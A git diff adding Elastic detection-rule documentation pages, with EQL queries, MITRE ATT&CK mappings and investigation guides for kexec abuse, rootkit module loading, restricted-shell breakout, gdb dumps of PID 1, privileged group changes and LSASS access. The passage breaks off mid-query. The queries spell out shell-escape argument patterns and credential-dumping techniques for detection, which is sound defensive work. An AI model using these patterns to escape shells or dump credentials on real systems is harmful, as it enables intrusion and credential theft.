Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Domain Accounts +** ID: T1078.002 +** Reference URL: https://attack.mitre.org/techniques/T1078/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-kernel-load-or-unload-via-kexec-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-kernel-load-or-unload-via-kexec-detected.asciidoc new file mode 100644 index 0000000000..110c2771d6 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-kernel-load-or-unload-via-kexec-detected.asciidoc @@ -0,0 +1,90 @@ +[[prebuilt-rule-8-10-5-kernel-load-or-unload-via-kexec-detected]] +=== Kernel Load or Unload via Kexec Detected + +This detection rule identifies the usage of kexec, helping to uncover unauthorized kernel replacements and potential compromise of the system's integrity. Kexec is a Linux feature that enables the loading and execution of a different kernel without going through the typical boot process. Malicious actors can abuse kexec to bypass security measures, escalate privileges, establish persistence or hide their activities by loading a malicious kernel, enabling them to tamper with the system's trusted state, allowing e.g. a VM Escape. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.crowdstrike.com/blog/venom-vulnerability-details/ +* https://www.makeuseof.com/what-is-venom-vulnerability/ +* https://madaidans-insecurities.github.io/guides/linux-hardening.html + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Privilege Escalation +* Tactic: Defense Evasion +* Data Source: Elastic Defend + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action == "exec" and process.name == "kexec" and +process.args in ("--exec", "-e", "--load", "-l", "--unload", "-u") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Escape to Host +** ID: T1611 +** Reference URL: https://attack.mitre.org/techniques/T1611/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Boot or Logon Autostart Execution +** ID: T1547 +** Reference URL: https://attack.mitre.org/techniques/T1547/ +* Sub-technique: +** Name: Kernel Modules and Extensions +** ID: T1547.006 +** Reference URL: https://attack.mitre.org/techniques/T1547/006/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify System Image +** ID: T1601 +** Reference URL: https://attack.mitre.org/techniques/T1601/ +* Sub-technique: +** Name: Patch System Image +** ID: T1601.001 +** Reference URL: https://attack.mitre.org/techniques/T1601/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-kernel-module-load-via-insmod.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-kernel-module-load-via-insmod.asciidoc new file mode 100644 index 0000000000..7c0cf5aa99 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-kernel-module-load-via-insmod.asciidoc @@ -0,0 +1,69 @@ +[[prebuilt-rule-8-10-5-kernel-module-load-via-insmod]] +=== Kernel Module Load via insmod + +Detects the use of the insmod binary to load a Linux kernel object file. Threat actors can use this binary, given they have root privileges, to load a rootkit on a system providing them with complete control and the ability to hide from security products. Manually loading a kernel module in this manner should not be at all common and can indicate suspcious or malicious behavior. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://decoded.avast.io/davidalvarez/linux-threat-hunting-syslogk-a-kernel-rootkit-found-under-development-in-the-wild/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Threat: Rootkit +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and process.name == "insmod" and process.args : "*.ko" +and not process.parent.name in ("cisco-amp-helper", "ksplice-apply") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Boot or Logon Autostart Execution +** ID: T1547 +** Reference URL: https://attack.mitre.org/techniques/T1547/ +* Sub-technique: +** Name: Kernel Modules and Extensions +** ID: T1547.006 +** Reference URL: https://attack.mitre.org/techniques/T1547/006/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-kernel-module-removal.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-kernel-module-removal.asciidoc new file mode 100644 index 0000000000..7dd00e8244 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-kernel-module-removal.asciidoc @@ -0,0 +1,81 @@ +[[prebuilt-rule-8-10-5-kernel-module-removal]] +=== Kernel Module Removal + +Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* http://man7.org/linux/man-pages/man8/modprobe.8.html + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action == "exec" and process.name == "rmmod" or +(process.name == "modprobe" and process.args in ("--remove", "-r")) and +process.parent.name in ("sudo", "bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Boot or Logon Autostart Execution +** ID: T1547 +** Reference URL: https://attack.mitre.org/techniques/T1547/ +* Sub-technique: +** Name: Kernel Modules and Extensions +** ID: T1547.006 +** Reference URL: https://attack.mitre.org/techniques/T1547/006/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-lateral-movement-via-startup-folder.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-lateral-movement-via-startup-folder.asciidoc new file mode 100644 index 0000000000..1f36bcd91c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-lateral-movement-via-startup-folder.asciidoc @@ -0,0 +1,95 @@ +[[prebuilt-rule-8-10-5-lateral-movement-via-startup-folder]] +=== Lateral Movement via Startup Folder + +Identifies suspicious file creations in the startup folder of a remote system. An adversary could abuse this to move laterally by dropping a malicious script or executable that will be executed after a reboot or user logon. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* winlogbeat-* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.mdsec.co.uk/2017/06/rdpinception/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "windows" and event.type in ("creation", "change") and + + /* via RDP TSClient mounted share or SMB */ + (process.name : "mstsc.exe" or process.pid == 4) and + + file.path : ("?:\\Users\\*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*", + "?:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: Remote Desktop Protocol +** ID: T1021.001 +** Reference URL: https://attack.mitre.org/techniques/T1021/001/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Boot or Logon Autostart Execution +** ID: T1547 +** Reference URL: https://attack.mitre.org/techniques/T1547/ +* Sub-technique: +** Name: Registry Run Keys / Startup Folder +** ID: T1547.001 +** Reference URL: https://attack.mitre.org/techniques/T1547/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-linux-init-pid-1-secret-dump-via-gdb.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-linux-init-pid-1-secret-dump-via-gdb.asciidoc new file mode 100644 index 0000000000..5273af6f42 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-linux-init-pid-1-secret-dump-via-gdb.asciidoc @@ -0,0 +1,67 @@ +[[prebuilt-rule-8-10-5-linux-init-pid-1-secret-dump-via-gdb]] +=== Linux init (PID 1) Secret Dump via GDB + +This rule monitors for the potential memory dump of the init process (PID 1) through gdb. Attackers may leverage memory dumping techniques to attempt secret extraction from privileged processes. Tools that display this behavior include "truffleproc" and "bash-memory-dump". This behavior should not happen by default, and should be investigated thoroughly. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/controlplaneio/truffleproc +* https://github.com/hajzer/bash-memory-dump + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Credential Access +* Data Source: Elastic Defend + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and +process.name == "gdb" and process.args in ("--pid", "-p") and process.args == "1" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: OS Credential Dumping +** ID: T1003 +** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Sub-technique: +** Name: Proc Filesystem +** ID: T1003.007 +** Reference URL: https://attack.mitre.org/techniques/T1003/007/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-linux-restricted-shell-breakout-via-linux-binary-s.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-linux-restricted-shell-breakout-via-linux-binary-s.asciidoc new file mode 100644 index 0000000000..b03ea93272 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-linux-restricted-shell-breakout-via-linux-binary-s.asciidoc @@ -0,0 +1,193 @@ +[[prebuilt-rule-8-10-5-linux-restricted-shell-breakout-via-linux-binary-s]] +=== Linux Restricted Shell Breakout via Linux Binary(s) + +Identifies the abuse of a Linux binary to break out of a restricted shell or environment by spawning an interactive system shell. The activity of spawning a shell from a binary is not common behavior for a user or system administrator, and may indicate an attempt to evade detection, increase capabilities or enhance the stability of an adversary. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://gtfobins.github.io/gtfobins/apt/ +* https://gtfobins.github.io/gtfobins/apt-get/ +* https://gtfobins.github.io/gtfobins/nawk/ +* https://gtfobins.github.io/gtfobins/mawk/ +* https://gtfobins.github.io/gtfobins/awk/ +* https://gtfobins.github.io/gtfobins/gawk/ +* https://gtfobins.github.io/gtfobins/busybox/ +* https://gtfobins.github.io/gtfobins/c89/ +* https://gtfobins.github.io/gtfobins/c99/ +* https://gtfobins.github.io/gtfobins/cpulimit/ +* https://gtfobins.github.io/gtfobins/crash/ +* https://gtfobins.github.io/gtfobins/env/ +* https://gtfobins.github.io/gtfobins/expect/ +* https://gtfobins.github.io/gtfobins/find/ +* https://gtfobins.github.io/gtfobins/flock/ +* https://gtfobins.github.io/gtfobins/gcc/ +* https://gtfobins.github.io/gtfobins/mysql/ +* https://gtfobins.github.io/gtfobins/nice/ +* https://gtfobins.github.io/gtfobins/ssh/ +* https://gtfobins.github.io/gtfobins/vi/ +* https://gtfobins.github.io/gtfobins/vim/ +* https://gtfobins.github.io/gtfobins/capsh/ +* https://gtfobins.github.io/gtfobins/byebug/ +* https://gtfobins.github.io/gtfobins/git/ +* https://gtfobins.github.io/gtfobins/ftp/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 110 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Shell Evasion via Linux Utilities +Detection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or +environments by spawning an interactive system shell. +Here are some possible avenues of investigation: +- Examine the entry point to the host and user in action via the Analyse View. + - Identify the session entry leader and session user +- Examine the contents of session leading to the abuse via the Session View. + - Examine the command execution pattern in the session, which may lead to suspricous activities +- Examine the execution of commands in the spawned shell. + - Identify imment threat to the system from the executed commands + - Take necessary incident response actions to contain any malicious behviour caused via this execution. + +### Related rules + +- A malicious spawned shell can execute any of the possible MITTRE ATT&CK vectors mainly to impair defences. +- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment + +### Response and remediation + +Initiate the incident response process based on the outcome of the triage. + +- If the triage releaved suspicious netwrok activity from the malicious spawned shell, + - Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware execution via the maliciously spawned shell, + - Search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- If the triage revelaed defence evasion for imparing defenses + - Isolate the involved host to prevent further post-compromise behavior. + - Identified the disabled security guard components on the host and take necessary steps in renebaling the same. + - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same. +- If the triage revelaed addition of persistence mechanism exploit like auto start scripts + - Isolate further login to the systems that can initae auto start scripts. + - Identify the auto start scripts and disable and remove the same from the systems +- If the triage revealed data crawling or data export via remote copy + - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling + - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials. + - Investiagte if any IPR data was accessed during the data crawling and take appropriate actions. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and +( + /* launching shell from capsh */ + (process.name == "capsh" and process.args == "--") or + + /* launching shells from unusual parents or parent+arg combos */ + (process.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and ( + (process.parent.name : "*awk" and process.parent.args : "BEGIN {system(*)}") or + (process.parent.name == "git" and process.parent.args : ("*PAGER*", "!*sh", "exec *sh") or + process.args : ("*PAGER*", "!*sh", "exec *sh") and not process.name == "ssh" ) or + (process.parent.name : ("byebug", "ftp", "strace", "zip", "tar") and + ( + process.parent.args : "BEGIN {system(*)}" or + (process.parent.args : ("*PAGER*", "!*sh", "exec *sh") or process.args : ("*PAGER*", "!*sh", "exec *sh")) or + ( + (process.parent.args : "exec=*sh" or (process.parent.args : "-I" and process.parent.args : "*sh")) or + (process.args : "exec=*sh" or (process.args : "-I" and process.args : "*sh")) + ) + ) + ) or + + /* shells specified in parent args */ + /* nice rule is broken in 8.2 */ + (process.parent.args : "*sh" and + ( + (process.parent.name == "nice") or + (process.parent.name == "cpulimit" and process.parent.args == "-f") or + (process.parent.name == "find" and process.parent.args == "." and process.parent.args == "-exec" and + process.parent.args == ";" and process.parent.args : "/bin/*sh") or + (process.parent.name == "flock" and process.parent.args == "-u" and process.parent.args == "/") + ) + ) + )) or + + /* shells specified in args */ + (process.args : "*sh" and ( + (process.parent.name == "crash" and process.parent.args == "-h") or + (process.name == "sensible-pager" and process.parent.name in ("apt", "apt-get") and process.parent.args == "changelog") + /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */ + + )) or + (process.name == "busybox" and event.action == "exec" and process.args_count == 2 and process.args : "*sh" and not + process.executable : "/var/lib/docker/overlay2/*/merged/bin/busybox" and not (process.parent.args == "init" and + process.parent.args == "runc") and not process.parent.args in ("ls-remote", "push", "fetch") and not process.parent.name == "mkinitramfs") or + (process.name == "env" and process.args_count == 2 and process.args : "*sh") or + (process.parent.name in ("vi", "vim") and process.parent.args == "-c" and process.parent.args : ":!*sh") or + (process.parent.name in ("c89", "c99", "gcc") and process.parent.args : "*sh,-s" and process.parent.args == "-wrapper") or + (process.parent.name == "expect" and process.parent.args == "-c" and process.parent.args : "spawn *sh;interact") or + (process.parent.name == "mysql" and process.parent.args == "-e" and process.parent.args : "\\!*sh") or + (process.parent.name == "ssh" and process.parent.args == "-o" and process.parent.args : "ProxyCommand=;*sh 0<&2 1>&2") +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-linux-user-added-to-privileged-group.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-linux-user-added-to-privileged-group.asciidoc new file mode 100644 index 0000000000..429c0c8469 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-linux-user-added-to-privileged-group.asciidoc @@ -0,0 +1,128 @@ +[[prebuilt-rule-8-10-5-linux-user-added-to-privileged-group]] +=== Linux User Added to Privileged Group + +Identifies attempts to add a user to a privileged group. Attackers may add users to a privileged group in order to establish persistence on a system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Data Source: Elastic Endgame +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Linux User User Added to Privileged Group + +The `usermod`, `adduser`, and `gpasswd` commands can be used to assign user accounts to new groups in Linux-based operating systems. + +Attackers may add users to a privileged group in order to escalate privileges or establish persistence on a system or domain. + +This rule identifies the usages of `usermod`, `adduser` and `gpasswd` to assign user accounts to a privileged group. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. +> This investigation guide uses {security-guide}/security/current/osquery-placeholder-fields.html[placeholder fields] to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run. + +#### Possible investigation steps + +- Investigate whether the user was succesfully added to the privileged group. + - !{osquery{"label":"Osquery - Retrieve Information for a Specific User","query":"SELECT * FROM users WHERE username = {{user.name}}"}} +- Investigate whether the user is currently logged in and active. + - !{osquery{"label":"Osquery - Investigate the Account Authentication Status","query":"SELECT * FROM logged_in_users WHERE user = {{user.name}}"}} +- Retrieve information about the privileged group to which the user was added. + - !{osquery{"label":"Osquery - Retrieve Information for a Specific Group","query":"SELECT * FROM groups WHERE groupname = {{group.name}}"}} +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations. + - !{osquery{"label":"Osquery - Retrieve Running Processes by User","query":"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username"}} +- Identify the user account that performed the action and whether it should perform this kind of action. +- Investigate other alerts associated with the user/host during the past 48 hours. + +### False positive analysis + +- Adding accounts to a group is a common administrative task, so there is a high chance of the activity being legitimate. Before investigating further, verify that this activity is not benign. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed. +- Delete the account that seems to be involved in malicious activity. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and +process.parent.name == "sudo" and +process.args in ("root", "admin", "wheel", "staff", "sudo", + "disk", "video", "shadow", "lxc", "lxd") and +( + process.name in ("usermod", "adduser") or + process.name == "gpasswd" and + process.args in ("-a", "--add", "-M", "--members") +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Create Account +** ID: T1136 +** Reference URL: https://attack.mitre.org/techniques/T1136/ +* Sub-technique: +** Name: Local Account +** ID: T1136.001 +** Reference URL: https://attack.mitre.org/techniques/T1136/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-local-account-tokenfilter-policy-disabled.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-local-account-tokenfilter-policy-disabled.asciidoc new file mode 100644 index 0000000000..efa40734ae --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-local-account-tokenfilter-policy-disabled.asciidoc @@ -0,0 +1,87 @@ +[[prebuilt-rule-8-10-5-local-account-tokenfilter-policy-disabled]] +=== Local Account TokenFilter Policy Disabled + +Identifies registry modification to the LocalAccountTokenFilterPolicy policy. If this value exists (which doesn't by default) and is set to 1, then remote connections from all local members of Administrators are granted full high-integrity tokens during negotiation. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.stigviewer.com/stig/windows_server_2008_r2_member_server/2014-04-02/finding/V-36439 +* https://posts.specterops.io/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy-506c25a7c167 +* https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Lateral Movement +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 6 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and registry.path : ( + "HKLM\\*\\LocalAccountTokenFilterPolicy", + "\\REGISTRY\\MACHINE\\*\\LocalAccountTokenFilterPolicy") and + registry.data.strings : ("1", "0x00000001") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Use Alternate Authentication Material +** ID: T1550 +** Reference URL: https://attack.mitre.org/techniques/T1550/ +* Sub-technique: +** Name: Pass the Hash +** ID: T1550.002 +** Reference URL: https://attack.mitre.org/techniques/T1550/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-lsass-process-access-via-windows-api.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-lsass-process-access-via-windows-api.asciidoc new file mode 100644 index 0000000000..02abb897aa --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-lsass-process-access-via-windows-api.asciidoc @@ -0,0 +1,100 @@ +[[prebuilt-rule-8-10-5-lsass-process-access-via-windows-api]] +=== LSASS Process Access via Windows API + +Identifies access attempts to the LSASS handle, which may indicate an attempt to dump credentials from LSASS memory. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Credential Access +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +api where host.os.type == "windows" and + process.Ext.api.name in ("OpenProcess", "OpenThread") and Target.process.name : "lsass.exe" and + not process.executable : + ("?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\*\\MsMpEng.exe", + "?:\\Program Files\\Microsoft Security Client\\MsMpEng.exe", + "?:\\Program Files*\\Windows Defender\\MsMpEng.exe", + "?:\\Program Files (x86)\\N-able Technologies\\Windows Agent\\bin\\agent.exe", + "?:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "?:\\Windows\\SysWOW64\\wbem\\WmiPrvSE.exe", + "?:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "?:\\Program Files (x86)\\N-able Technologies\\Reactive\\bin\\NableReactiveManagement.exe", + "?:\\Program Files\\EA\\AC\\EAAntiCheat.GameService.exe", + "?:\\Program Files\\Cisco\\AMP\\*\\sfc.exe", + "?:\\Program 